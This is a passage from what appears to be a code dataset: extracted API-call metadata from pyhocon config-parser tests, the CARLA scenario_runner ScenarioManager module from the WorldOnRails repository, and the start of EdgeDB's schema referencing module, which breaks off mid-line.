""")\n', (27591, 27671), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((29914, 29956), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (29927, 29956), False, 'import pytest\n'), ((29970, 30090), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = ${x} {y: 1}\n x = ${x.y}\n """'], {}), '(\n """\n x = ${x} {y: 1}\n x = ${x.y}\n """\n )\n', (29996, 30090), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34630, 34665), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (34643, 34665), False, 'import pytest\n'), ((34679, 34730), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""common_modules [perl]"""'], {}), "('common_modules [perl]')\n", (34705, 34730), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34745, 34774), 'pytest.raises', 'pytest.raises', (['ParseException'], {}), '(ParseException)\n', (34758, 34774), False, 'import pytest\n'), ((34788, 34845), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""common_modules {} {perl: 1}"""'], {}), "('common_modules {} {perl: 1}')\n", (34814, 34845), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34860, 34895), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (34873, 34895), False, 'import pytest\n'), ((34909, 35043), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = {f: 5}\n common_modules ${a} {perl: 1}\n """'], {}), '(\n """\n a = {f: 5}\n common_modules ${a} {perl: 1}\n """\n )\n', (34935, 35043), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((35098, 35133), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (35111, 35133), False, 'import pytest\n'), ((35147, 35295), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = {\n f: 5\n g\n }\n """'], {}), '(\n """\n a = {\n f: 5\n g\n }\n """\n )\n', (35173, 35295), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((35317, 35352), 'pytest.raises', 'pytest.raises', (['ParseSyntaxException'], {}), '(ParseSyntaxException)\n', (35330, 35352), False, 'import pytest\n'), ((35366, 35403), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = {g}"""'], {}), "('a = {g}')\n", (35392, 35403), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((35451, 35483), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (35478, 35483), False, 'import tempfile\n'), ((37360, 37382), 'pytest.raises', 'pytest.raises', (['IOError'], {}), '(IOError)\n', (37373, 37382), False, 'import pytest\n'), ((37396, 37590), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n include required("dummy.txt")\n 3\n 4\n ]\n """'], {}), '(\n """\n a: [\n include required("dummy.txt")\n 3\n 4\n ]\n """\n )\n', (37422, 37590), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37828, 37853), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (37841, 37853), False, 'import pytest\n'), ((37867, 37928), 'pyhocon.ConfigParser.resolve_package_path', 'ConfigParser.resolve_package_path', (['"""pyhocon/config_parser.py"""'], {}), "('pyhocon/config_parser.py')\n", (37900, 37928), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37992, 38018), 'pytest.raises', 'pytest.raises', (['ImportError'], {}), '(ImportError)\n', (38005, 38018), False, 'import pytest\n'), ((38032, 38095), 'pyhocon.ConfigParser.resolve_package_path', 'ConfigParser.resolve_package_path', (['"""non_existent_module:foo.py"""'], {}), "('non_existent_module:foo.py')\n", (38065, 38095), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((38227, 38262), 'os.path.join', 'os.path.join', (['temp_dir', '"""my_module"""'], {}), "(temp_dir, 'my_module')\n", (38239, 38262), False, 'import os\n'), ((38289, 38324), 'os.path.join', 'os.path.join', (['module_dir', '"""my.conf"""'], {}), "(module_dir, 'my.conf')\n", (38301, 38324), False, 'import os\n'), ((38418, 38438), 'os.mkdir', 'os.mkdir', (['module_dir'], {}), '(module_dir)\n', (38426, 38438), False, 'import os\n'), ((38829, 38985), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: 2\n include package("my_module:my.conf")\n """'], {}), '(\n """\n a: 1\n b: 2\n include package("my_module:my.conf")\n """\n )\n', (38855, 38985), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((39192, 39235), 'shutil.rmtree', 'shutil.rmtree', (['temp_dir'], {'ignore_errors': '(True)'}), '(temp_dir, ignore_errors=True)\n', (39205, 39235), False, 'import shutil\n'), ((39397, 39429), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (39424, 39429), False, 'import tempfile\n'), ((40494, 40526), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (40521, 40526), False, 'import tempfile\n'), ((40940, 40972), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', (['"""w"""'], {}), "('w')\n", (40967, 40972), False, 'import tempfile\n'), ((41076, 41281), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['("""\n {\n a : { include """ + \'"\' + fdin.\n name +\n """" }\n a : { x : 42 }\n }\n """\n )'], {}), '(\n """\n {\n a : { include """ + \'"\' +\n fdin.name +\n """" }\n a : { x : 42 }\n }\n """\n )\n', (41102, 41281), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((45054, 45096), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (45067, 45096), False, 'import pytest\n'), ((45110, 45246), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = ${b}\n b = ${c}\n c = ${a}\n """'], {}), '(\n """\n a = ${b}\n b = ${c}\n c = ${a}\n """\n )\n', (45136, 45246), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((60042, 60072), 'pytest.raises', 'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (60055, 60072), False, 'import pytest\n'), ((64452, 64491), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (64465, 64491), False, 'import pytest\n'), ((64578, 64615), 'pytest.raises', 'pytest.raises', (['ConfigMissingException'], {}), '(ConfigMissingException)\n', (64591, 64615), False, 'import pytest\n'), ((64686, 64716), 'pytest.raises', 'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (64699, 64716), False, 'import pytest\n'), ((64789, 64819), 'pytest.raises', 'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (64802, 64819), False, 'import pytest\n'), ((64892, 64922), 'pytest.raises', 'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (64905, 64922), False, 'import pytest\n'), ((64997, 65036), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (65010, 65036), False, 'import pytest\n'), ((69051, 69069), 'json.loads', 'json.loads', (['source'], {}), '(source)\n', (69061, 69069), False, 'import json\n'), ((3276, 3293), 'datetime.timedelta', 'period', ([], {'minutes': '(1)'}), '(minutes=1)\n', (3282, 3293), True, 'from datetime import timedelta as period\n'), ((3320, 3337), 'datetime.timedelta', 'period', ([], {'minutes': '(1)'}), '(minutes=1)\n', (3326, 3337), True, 'from datetime import timedelta as period\n'), ((3364, 3381), 'datetime.timedelta', 'period', ([], {'minutes': '(2)'}), '(minutes=2)\n', (3370, 3381), True, 'from datetime import timedelta as period\n'), ((3403, 3420), 'datetime.timedelta', 'period', ([], {'minutes': '(3)'}), '(minutes=3)\n', (3409, 3420), True, 'from datetime import timedelta as period\n'), ((3441, 3458), 'datetime.timedelta', 'period', ([], {'minutes': '(3)'}), '(minutes=3)\n', (3447, 3458), True, 'from datetime import timedelta as period\n'), ((3518, 3535), 'datetime.timedelta', 'period', ([], {'seconds': '(4)'}), '(seconds=4)\n', (3524, 3535), True, 'from datetime import timedelta as period\n'), ((3562, 3579), 'datetime.timedelta', 'period', ([], {'seconds': '(5)'}), '(seconds=5)\n', (3568, 3579), True, 'from datetime import timedelta as period\n'), ((3601, 3618), 'datetime.timedelta', 'period', ([], {'seconds': '(6)'}), '(seconds=6)\n', (3607, 3618), True, 'from datetime import timedelta as period\n'), ((3676, 3691), 'datetime.timedelta', 'period', ([], {'hours': '(7)'}), '(hours=7)\n', (3682, 3691), True, 'from datetime import timedelta as period\n'), ((3716, 3731), 'datetime.timedelta', 'period', ([], {'hours': '(8)'}), '(hours=8)\n', (3722, 3731), True, 'from datetime import timedelta as period\n'), ((3753, 3768), 'datetime.timedelta', 'period', ([], {'hours': '(9)'}), '(hours=9)\n', (3759, 3768), True, 'from datetime import timedelta as period\n'), ((3796, 3812), 'datetime.timedelta', 'period', ([], {'weeks': '(10)'}), '(weeks=10)\n', (3802, 3812), True, 'from datetime import timedelta as period\n'), ((3838, 3854), 'datetime.timedelta', 'period', ([], {'weeks': '(11)'}), '(weeks=11)\n', (3844, 3854), True, 'from datetime import timedelta as period\n'), ((3877, 3893), 'datetime.timedelta', 'period', ([], {'weeks': '(12)'}), '(weeks=12)\n', (3883, 3893), True, 'from datetime import timedelta as period\n'), ((3920, 3935), 'datetime.timedelta', 'period', ([], {'days': '(10)'}), '(days=10)\n', (3926, 3935), True, 'from datetime import timedelta as period\n'), ((3960, 3975), 'datetime.timedelta', 'period', ([], {'days': '(11)'}), '(days=11)\n', (3966, 3975), True, 'from datetime import timedelta as period\n'), ((3998, 4013), 'datetime.timedelta', 'period', ([], {'days': '(12)'}), '(days=12)\n', (4004, 4013), True, 'from datetime import timedelta as period\n'), ((4049, 4073), 'datetime.timedelta', 'period', ([], {'microseconds': '(110)'}), '(microseconds=110)\n', (4055, 4073), True, 'from datetime import timedelta as period\n'), ((4107, 4131), 'datetime.timedelta', 'period', ([], {'microseconds': '(111)'}), '(microseconds=111)\n', (4113, 4131), True, 'from datetime import timedelta as period\n'), ((4160, 4184), 'datetime.timedelta', 'period', ([], {'microseconds': '(112)'}), '(microseconds=112)\n', (4166, 4184), True, 'from datetime import timedelta as period\n'), ((4212, 4236), 'datetime.timedelta', 'period', ([], {'microseconds': '(113)'}), '(microseconds=113)\n', (4218, 4236), True, 'from datetime import timedelta as period\n'), ((4261, 4285), 'datetime.timedelta', 'period', ([], {'microseconds': '(114)'}), '(microseconds=114)\n', (4267, 4285), True, 'from datetime import timedelta as period\n'), ((4321, 4348), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(110)'}), '(milliseconds=110)\n', (4330, 4348), False, 'from datetime import timedelta\n'), ((4382, 4409), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(111)'}), '(milliseconds=111)\n', (4391, 4409), False, 'from datetime import timedelta\n'), ((4438, 4465), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(112)'}), '(milliseconds=112)\n', (4447, 4465), False, 'from datetime import timedelta\n'), ((4493, 4520), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(113)'}), '(milliseconds=113)\n', (4502, 4520), False, 'from datetime import timedelta\n'), ((4545, 4572), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(114)'}), '(milliseconds=114)\n', (4554, 4572), False, 'from datetime import timedelta\n'), ((4607, 4629), 'datetime.timedelta', 'period', ([], {'microseconds': '(0)'}), '(microseconds=0)\n', (4613, 4629), True, 'from datetime import timedelta as period\n'), ((4665, 4688), 'datetime.timedelta', 'period', ([], {'microseconds': '(11)'}), '(microseconds=11)\n', (4671, 4688), True, 'from datetime import timedelta as period\n'), ((4725, 4750), 'datetime.timedelta', 'period', ([], {'microseconds': '(1110)'}), '(microseconds=1110)\n', (4731, 4750), True, 'from datetime import timedelta as period\n'), ((4782, 4807), 'datetime.timedelta', 'period', ([], {'microseconds': '(1120)'}), '(microseconds=1120)\n', (4788, 4807), True, 'from datetime import timedelta as period\n'), ((4838, 4863), 'datetime.timedelta', 'period', ([], {'microseconds': '(1130)'}), '(microseconds=1130)\n', (4844, 4863), True, 'from datetime import timedelta as period\n'), ((4892, 4917), 'datetime.timedelta', 'period', ([], {'microseconds': '(1140)'}), '(microseconds=1140)\n', (4898, 4917), True, 'from datetime import timedelta as period\n'), ((5639, 5655), 'datetime.timedelta', 'period', ([], {'weeks': '(10)'}), '(weeks=10)\n', (5645, 5655), True, 'from datetime import timedelta as period\n'), ((5657, 5674), 'datetime.timedelta', 'period', ([], {'minutes': '(5)'}), '(minutes=5)\n', (5663, 5674), True, 'from datetime import timedelta as period\n'), ((69198, 69221), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(1)'}), '(months=1)\n', (69211, 69221), False, 'from dateutil.relativedelta import relativedelta\n'), ((69247, 69270), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(1)'}), '(months=1)\n', (69260, 69270), False, 'from dateutil.relativedelta import relativedelta\n'), ((69296, 69319), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(2)'}), '(months=2)\n', (69309, 69319), False, 'from dateutil.relativedelta import relativedelta\n'), ((69342, 69365), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(3)'}), '(months=3)\n', (69355, 69365), False, 'from dateutil.relativedelta import relativedelta\n'), ((69387, 69410), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(3)'}), '(months=3)\n', (69400, 69410), False, 'from dateutil.relativedelta import relativedelta\n'), ((69468, 69490), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(1)'}), '(years=1)\n', (69481, 69490), False, 'from dateutil.relativedelta import relativedelta\n'), ((69515, 69537), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(1)'}), '(years=1)\n', (69528, 69537), False, 'from dateutil.relativedelta import relativedelta\n'), ((69562, 69584), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(2)'}), '(years=2)\n', (69575, 69584), False, 'from dateutil.relativedelta import relativedelta\n'), ((69606, 69628), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(3)'}), '(years=3)\n', (69619, 69628), False, 'from dateutil.relativedelta import relativedelta\n'), ((69649, 69671), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(3)'}), '(years=3)\n', (69662, 69671), False, 'from dateutil.relativedelta import relativedelta\n'), ((38456, 38495), 'os.path.join', 'os.path.join', (['module_dir', '"""__init__.py"""'], {}), "(module_dir, '__init__.py')\n", (38468, 38495), False, 'import os\n'), ((44020, 44071), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a=${b}"""'], {'resolve': '(False)'}), "('a=${b}', resolve=False)\n", (44046, 44071), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n')]
cgeller/WorldOnRails
scenario_runner/srunner/scenariomanager/scenario_manager.py
d8aa9f7ae67a6b7b71a2fc5ba86bb2a44f221bef
#!/usr/bin/env python # Copyright (c) 2018-2020 Intel Corporation # # This work is licensed under the terms of the MIT license. # For a copy, see <https://opensource.org/licenses/MIT>. """ This module provides the ScenarioManager implementation. It must not be modified and is for reference only! """ from __future__ import print_function import sys import time import py_trees from srunner.autoagents.agent_wrapper import AgentWrapper from srunner.scenariomanager.carla_data_provider import CarlaDataProvider from srunner.scenariomanager.result_writer import ResultOutputProvider from srunner.scenariomanager.timer import GameTime from srunner.scenariomanager.watchdog import Watchdog class ScenarioManager(object): """ Basic scenario manager class. This class holds all functionality required to start, and analyze a scenario. The user must not modify this class. To use the ScenarioManager: 1. Create an object via manager = ScenarioManager() 2. Load a scenario via manager.load_scenario() 3. Trigger the execution of the scenario manager.run_scenario() This function is designed to explicitly control start and end of the scenario execution 4. Trigger a result evaluation with manager.analyze_scenario() 5. If needed, cleanup with manager.stop_scenario() """ def __init__(self, debug_mode=False, sync_mode=False, timeout=2.0): """ Setups up the parameters, which will be filled at load_scenario() """ self.scenario = None self.scenario_tree = None self.scenario_class = None self.ego_vehicles = None self.other_actors = None self._debug_mode = debug_mode self._agent = None self._sync_mode = sync_mode self._running = False self._timestamp_last_run = 0.0 self._timeout = timeout self._watchdog = Watchdog(float(self._timeout)) self.scenario_duration_system = 0.0 self.scenario_duration_game = 0.0 self.start_system_time = None self.end_system_time = None def _reset(self): """ Reset all parameters """ self._running = False self._timestamp_last_run = 0.0 self.scenario_duration_system = 0.0 self.scenario_duration_game = 0.0 self.start_system_time = None self.end_system_time = None GameTime.restart() def cleanup(self): """ This function triggers a proper termination of a scenario """ if self.scenario is not None: self.scenario.terminate() if self._agent is not None: self._agent.cleanup() self._agent = None CarlaDataProvider.cleanup() def load_scenario(self, scenario, agent=None): """ Load a new scenario """ self._reset() self._agent = AgentWrapper(agent) if agent else None if self._agent is not None: self._sync_mode = True self.scenario_class = scenario self.scenario = scenario.scenario self.scenario_tree = self.scenario.scenario_tree self.ego_vehicles = scenario.ego_vehicles self.other_actors = scenario.other_actors # To print the scenario tree uncomment the next line # py_trees.display.render_dot_tree(self.scenario_tree) if self._agent is not None: self._agent.setup_sensors(self.ego_vehicles[0], self._debug_mode) def run_scenario(self): """ Trigger the start of the scenario and wait for it to finish/fail """ print("ScenarioManager: Running scenario {}".format(self.scenario_tree.name)) self.start_system_time = time.time() start_game_time = GameTime.get_time() self._watchdog.start() self._running = True while self._running: timestamp = None world = CarlaDataProvider.get_world() if world: snapshot = world.get_snapshot() if snapshot: timestamp = snapshot.timestamp if timestamp: self._tick_scenario(timestamp) self._watchdog.stop() self.cleanup() self.end_system_time = time.time() end_game_time = GameTime.get_time() self.scenario_duration_system = self.end_system_time - \ self.start_system_time self.scenario_duration_game = end_game_time - start_game_time if self.scenario_tree.status == py_trees.common.Status.FAILURE: print("ScenarioManager: Terminated due to failure") def _tick_scenario(self, timestamp): """ Run next tick of scenario and the agent. If running synchornously, it also handles the ticking of the world. """ if self._timestamp_last_run < timestamp.elapsed_seconds and self._running: self._timestamp_last_run = timestamp.elapsed_seconds self._watchdog.update() if self._debug_mode: print("\n--------- Tick ---------\n") # Update game time and actor information GameTime.on_carla_tick(timestamp) CarlaDataProvider.on_carla_tick() if self._agent is not None: ego_action = self._agent() # Tick scenario self.scenario_tree.tick_once() if self._debug_mode: print("\n") py_trees.display.print_ascii_tree(self.scenario_tree, show_status=True) sys.stdout.flush() if self.scenario_tree.status != py_trees.common.Status.RUNNING: self._running = False if self._agent is not None: self.ego_vehicles[0].apply_control(ego_action) if self._sync_mode and self._running and self._watchdog.get_status(): CarlaDataProvider.get_world().tick() def get_running_status(self): """ returns: bool: False if watchdog exception occured, True otherwise """ return self._watchdog.get_status() def stop_scenario(self): """ This function is used by the overall signal handler to terminate the scenario execution """ self._running = False def analyze_scenario(self, stdout, filename, junit): """ This function is intended to be called from outside and provide the final statistics about the scenario (human-readable, in form of a junit report, etc.) """ failure = False timeout = False result = "SUCCESS" if self.scenario.test_criteria is None: print("Nothing to analyze, this scenario has no criteria") return True for criterion in self.scenario.get_criteria(): if (not criterion.optional and criterion.test_status != "SUCCESS" and criterion.test_status != "ACCEPTABLE"): failure = True result = "FAILURE" elif criterion.test_status == "ACCEPTABLE": result = "ACCEPTABLE" if self.scenario.timeout_node.timeout and not failure: timeout = True result = "TIMEOUT" output = ResultOutputProvider(self, result, stdout, filename, junit) output.write() return failure or timeout
[((2400, 2418), 'srunner.scenariomanager.timer.GameTime.restart', 'GameTime.restart', ([], {}), '()\n', (2416, 2418), False, 'from srunner.scenariomanager.timer import GameTime\n'), ((2721, 2748), 'srunner.scenariomanager.carla_data_provider.CarlaDataProvider.cleanup', 'CarlaDataProvider.cleanup', ([], {}), '()\n', (2746, 2748), False, 'from srunner.scenariomanager.carla_data_provider import CarlaDataProvider\n'), ((3730, 3741), 'time.time', 'time.time', ([], {}), '()\n', (3739, 3741), False, 'import time\n'), ((3768, 3787), 'srunner.scenariomanager.timer.GameTime.get_time', 'GameTime.get_time', ([], {}), '()\n', (3785, 3787), False, 'from srunner.scenariomanager.timer import GameTime\n'), ((4268, 4279), 'time.time', 'time.time', ([], {}), '()\n', (4277, 4279), False, 'import time\n'), ((4304, 4323), 'srunner.scenariomanager.timer.GameTime.get_time', 'GameTime.get_time', ([], {}), '()\n', (4321, 4323), False, 'from srunner.scenariomanager.timer import GameTime\n'), ((7298, 7357), 'srunner.scenariomanager.result_writer.ResultOutputProvider', 'ResultOutputProvider', (['self', 'result', 'stdout', 'filename', 'junit'], {}), '(self, result, stdout, filename, junit)\n', (7318, 7357), False, 'from srunner.scenariomanager.result_writer import ResultOutputProvider\n'), ((2897, 2916), 'srunner.autoagents.agent_wrapper.AgentWrapper', 'AgentWrapper', (['agent'], {}), '(agent)\n', (2909, 2916), False, 'from srunner.autoagents.agent_wrapper import AgentWrapper\n'), ((3928, 3957), 'srunner.scenariomanager.carla_data_provider.CarlaDataProvider.get_world', 'CarlaDataProvider.get_world', ([], {}), '()\n', (3955, 3957), False, 'from srunner.scenariomanager.carla_data_provider import CarlaDataProvider\n'), ((5163, 5196), 'srunner.scenariomanager.timer.GameTime.on_carla_tick', 'GameTime.on_carla_tick', (['timestamp'], {}), '(timestamp)\n', (5185, 5196), False, 'from srunner.scenariomanager.timer import GameTime\n'), ((5209, 5242), 'srunner.scenariomanager.carla_data_provider.CarlaDataProvider.on_carla_tick', 'CarlaDataProvider.on_carla_tick', ([], {}), '()\n', (5240, 5242), False, 'from srunner.scenariomanager.carla_data_provider import CarlaDataProvider\n'), ((5477, 5548), 'py_trees.display.print_ascii_tree', 'py_trees.display.print_ascii_tree', (['self.scenario_tree'], {'show_status': '(True)'}), '(self.scenario_tree, show_status=True)\n', (5510, 5548), False, 'import py_trees\n'), ((5565, 5583), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (5581, 5583), False, 'import sys\n'), ((5894, 5923), 'srunner.scenariomanager.carla_data_provider.CarlaDataProvider.get_world', 'CarlaDataProvider.get_world', ([], {}), '()\n', (5921, 5923), False, 'from srunner.scenariomanager.carla_data_provider import CarlaDataProvider\n')]
disfated/edgedb
edb/schema/referencing.py
8d78f4a2a578f80780be160ba5f107f5bdc79063
# # This source file is part of the EdgeDB open source project. # # Copyright 2008-present MagicStack Inc. and the EdgeDB authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from __future__ import annotations from typing import * import hashlib from edb import errors from edb.common import struct from edb.edgeql import ast as qlast from . import delta as sd from . import inheriting from . import objects as so from . import schema as s_schema from . import name as sn from . import utils ReferencedT = TypeVar('ReferencedT', bound='ReferencedObject') ReferencedInheritingObjectT = TypeVar('ReferencedInheritingObjectT', bound='ReferencedInheritingObject') class ReferencedObject(so.DerivableObject): #: True if the object has an explicit definition and is not #: purely inherited. is_local = so.SchemaField( bool, default=False, inheritable=False, compcoef=0.909, reflection_method=so.ReflectionMethod.AS_LINK, ) def get_subject(self, schema: s_schema.Schema) -> Optional[so.Object]: # NB: classes that inherit ReferencedObject define a `get_subject` # method dynamically, with `subject = SchemaField` raise NotImplementedError def get_referrer(self, schema: s_schema.Schema) -> Optional[so.Object]: return self.get_subject(schema) def delete(self, schema: s_schema.Schema) -> s_schema.Schema: cmdcls = sd.ObjectCommandMeta.get_command_class_or_die( sd.DeleteObject, type(self)) cmd = cmdcls(classname=self.get_name(schema)) context = sd.CommandContext( modaliases={}, schema=schema, disable_dep_verification=True, ) delta, parent_cmd = cmd._build_alter_cmd_stack( schema, context, self) parent_cmd.add(cmd) with context(sd.DeltaRootContext(schema=schema, op=delta)): schema = delta.apply(schema, context) return schema def derive_ref( self: ReferencedT, schema: s_schema.Schema, referrer: so.QualifiedObject, *qualifiers: str, mark_derived: bool = False, attrs: Optional[Dict[str, Any]] = None, dctx: Optional[sd.CommandContext] = None, derived_name_base: Optional[str] = None, inheritance_merge: bool = True, preserve_path_id: Optional[bool] = None, refdict_whitelist: Optional[AbstractSet[str]] = None, transient: bool = False, name: Optional[str] = None, **kwargs: Any, ) -> Tuple[s_schema.Schema, ReferencedT]: if name is None: derived_name: str = self.get_derived_name( schema, referrer, *qualifiers, mark_derived=mark_derived, derived_name_base=derived_name_base) else: derived_name = name if self.get_name(schema) == derived_name: raise errors.SchemaError( f'cannot derive {self!r}({derived_name}) from itself') derived_attrs: Dict[str, object] = {} if attrs is not None: derived_attrs.update(attrs) derived_attrs['name'] = derived_name derived_attrs['bases'] = so.ObjectList.create( schema, [self]) mcls = type(self) referrer_class = type(referrer) refdict = referrer_class.get_refdict_for_class(mcls) reftype = referrer_class.get_field(refdict.attr).type refname = reftype.get_key_for_name(schema, derived_name) refcoll = referrer.get_field_value(schema, refdict.attr) existing = refcoll.get(schema, refname, default=None) if existing is not None: cmdcls: Type[sd.Command] = \ sd.ObjectCommandMeta.get_command_class_or_die(sd.AlterObject, type(self)) else: cmdcls = sd.ObjectCommandMeta.get_command_class_or_die( sd.CreateObject, type(self)) cmd = cmdcls(classname=derived_name) for k, v in derived_attrs.items(): cmd.set_attribute_value(k, v) if existing is not None: new_bases = derived_attrs['bases'] old_bases = existing.get_bases(schema) if new_bases != old_bases: assert isinstance(new_bases, so.ObjectList) removed_bases, added_bases = inheriting.delta_bases( [b.get_name(schema) for b in old_bases.objects(schema)], [b.get_name(schema) for b in new_bases.objects(schema)], ) rebase_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die( inheriting.RebaseInheritingObject, type(self)) rebase_cmd = rebase_cmdcls( classname=derived_name, added_bases=added_bases, removed_bases=removed_bases, ) cmd.add(rebase_cmd) context = sd.CommandContext( modaliases={}, schema=schema, ) assert isinstance(cmd, sd.ObjectCommand) delta, parent_cmd = cmd._build_alter_cmd_stack( schema, context, self, referrer=referrer) with context(sd.DeltaRootContext(schema=schema, op=delta)): if not inheritance_merge: context.current().inheritance_merge = False if refdict_whitelist is not None: context.current().inheritance_refdicts = refdict_whitelist if mark_derived: context.current().mark_derived = True if transient: context.current().transient_derivation = True if preserve_path_id: context.current().preserve_path_id = True parent_cmd.add(cmd) schema = delta.apply(schema, context) derived: ReferencedT = schema.get(derived_name) return schema, derived def get_verbosename( self, schema: s_schema.Schema, *, with_parent: bool = False, ) -> str: vn = super().get_verbosename(schema) if with_parent: subject = self.get_subject(schema) if subject is not None: pn = subject.get_verbosename(schema, with_parent=True) return f'{vn} of {pn}' return vn class ReferencedInheritingObject( so.DerivableInheritingObject, ReferencedObject, ): # Indicates that the object has been declared as # explicitly inherited. declared_overloaded = so.SchemaField( bool, default=False, compcoef=None, introspectable=False, inheritable=False, ephemeral=True, ) def get_implicit_bases( self: ReferencedInheritingObjectT, schema: s_schema.Schema, ) -> List[ReferencedInheritingObjectT]: return [ b for b in self.get_bases(schema).objects(schema) if not b.generic(schema) ] class ReferencedObjectCommandMeta(sd.ObjectCommandMeta): _transparent_adapter_subclass: ClassVar[bool] = True _referrer_context_class: Optional[ Type[sd.ObjectCommandContext[so.Object]] ] = None def __new__(mcls, name: str, bases: Tuple[type, ...], clsdct: Dict[str, Any], *, referrer_context_class: Optional[ Type[sd.ObjectCommandContext[so.Object]] ] = None, **kwargs: Any ) -> ReferencedObjectCommandMeta: cls = super().__new__(mcls, name, bases, clsdct, **kwargs) assert isinstance(cls, ReferencedObjectCommandMeta) if referrer_context_class is not None: cls._referrer_context_class = referrer_context_class return cls class ReferencedObjectCommandBase( sd.QualifiedObjectCommand[ReferencedT], metaclass=ReferencedObjectCommandMeta, ): @classmethod def get_referrer_context_class( cls, ) -> Type[sd.ObjectCommandContext[so.Object]]: if cls._referrer_context_class is None: raise TypeError( f'referrer_context_class is not defined for {cls}') return cls._referrer_context_class @classmethod def get_referrer_context( cls, context: sd.CommandContext, ) -> Optional[sd.ObjectCommandContext[so.Object]]: """Get the context of the command for the referring object, if any. E.g. for a `create/alter/etc concrete link` command this would be the context of the `create/alter/etc type` command. """ ctxcls = cls.get_referrer_context_class() ctx = context.get(ctxcls) # type: ignore return cast(Optional[sd.ObjectCommandContext[so.Object]], ctx) @classmethod def get_referrer_context_or_die( cls, context: sd.CommandContext, ) -> sd.ObjectCommandContext[so.Object]: ctx = cls.get_referrer_context(context) if ctx is None: raise RuntimeError(f'no referrer context for {cls}') return ctx class StronglyReferencedObjectCommand( ReferencedObjectCommandBase[ReferencedT] ): pass class ReferencedObjectCommand(ReferencedObjectCommandBase[ReferencedT]): @classmethod def _classname_from_ast(cls, schema: s_schema.Schema, astnode: qlast.NamedDDL, context: sd.CommandContext ) -> sn.Name: name = super()._classname_from_ast(schema, 